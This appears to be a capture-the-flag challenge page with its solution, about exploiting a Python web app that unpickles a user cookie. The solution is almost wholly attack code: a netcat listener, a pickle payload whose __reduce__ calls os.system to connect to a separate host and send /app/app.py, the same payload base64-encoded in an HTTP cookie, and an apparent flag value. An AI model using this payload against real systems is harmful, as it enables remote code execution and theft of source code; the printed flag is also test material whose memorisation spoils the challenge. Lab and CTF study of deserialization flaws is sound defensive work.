3 I'm Picle Rick!

3 I'm Picle Rick!

Tags

Python

Solved

DESCRIPTION

Albert is junior developer who started to build websites like 1 week ago.

Albert also likes to show off and brag about top notch security.

To prove Albert wrong You have to figure out how to exploit this application and retrieve source code from it.

Site can be accessed at:

http://10.12.32.142

"Good luck, this task will not be easy" - Albert.

QUESTION

Can You show some 1337 skills, and retrieve source code of Albert's application?

SOLUTION

nc -lvp 4444

Bash

import pickle
import base64
import os


class RCE:
def __reduce__(self):
        cmd = ('python3 -c \'import socket;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.12.32.100",4444));s.sendall(open("/app/app.py", "r").read().encode("utf-8"));\'')
return os.system, (cmd,)
if __name__ == '__main__':
    pickled = pickle.dumps(RCE())
    pickle.loads(pickled)
print(base64.urlsafe_b64encode(pickled))

Python

GET / HTTP/1.1
Host: 10.12.32.142
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: user=gASVxQAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjKpweXRob24zIC1jICdpbXBvcnQgc29ja2V0O3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoIjEwLjEyLjMyLjEwMCIsNDQ0NCkpO3Muc2VuZGFsbChvcGVuKCIvYXBwL2FwcC5weSIsICJyIikucmVhZCgpLmVuY29kZSgidXRmLTgiKSk7J5SFlFKULg==
Connection: close

Bash

2b43c3edc21d40db9bc78ce9d11cf142